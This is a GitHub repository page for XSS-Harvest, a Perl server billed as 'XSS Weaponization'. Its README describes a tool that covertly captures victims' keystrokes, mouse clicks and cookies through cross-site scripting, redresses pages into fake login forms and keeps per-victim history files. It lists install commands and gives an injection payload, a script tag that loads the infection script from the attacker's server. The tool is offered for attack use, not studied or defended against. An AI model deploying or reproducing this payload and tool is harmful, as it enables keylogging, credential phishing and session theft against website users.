Skip to content

Miserlou/XSS-Harvest

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
xss-harvest.pl
xss-harvest.pl
 
 

Repository files navigation

XSS-Harvest

0.2.x by Geoff Jones - 0x90.co.uk http://www.0x90.co.uk/2011/07/harvesting-cross-site-scripting-xss.html

About

XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:

  • Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
  • Any key entered will be sent covertly to the server.
  • Any mouse click performed will be analysed and the data covertly sent to the server.
  • Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
  • If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
  • Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
  • Each victim has a separate history file containing all events, cookies and keystrokes.
  • Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
  • Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
  • Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

Dependencies

Requires the following dependencies: HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork

Ubuntu/Debian install

sudo apt-get install libhttp-server-simple-perl libdigest-md5-file-perl libtime-local-perl libnet-server-perl

OSX Install

sudo cpan install HTTP::Server::Simple::CGI
sudo cpan install Digest::MD5
sudo cpan install Digest::Time::Local
sudo cpan install Getopt:Std
sudo cpan install Net::Server::Prefork

TODO

  • Hosted version?
  • urlEncoded Redress
  • Autominify/obfuscate
  • Database/dashboard
  • Payload generator

Usage

Start server (with redress:)

XSS:

  • <script src="http://<serverip>:<serverport>/i"></script>

About

XSS Weaponization

Resources

Readme

License

GPL-3.0 license
Activity

Stars

34 stars

Watchers

3 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages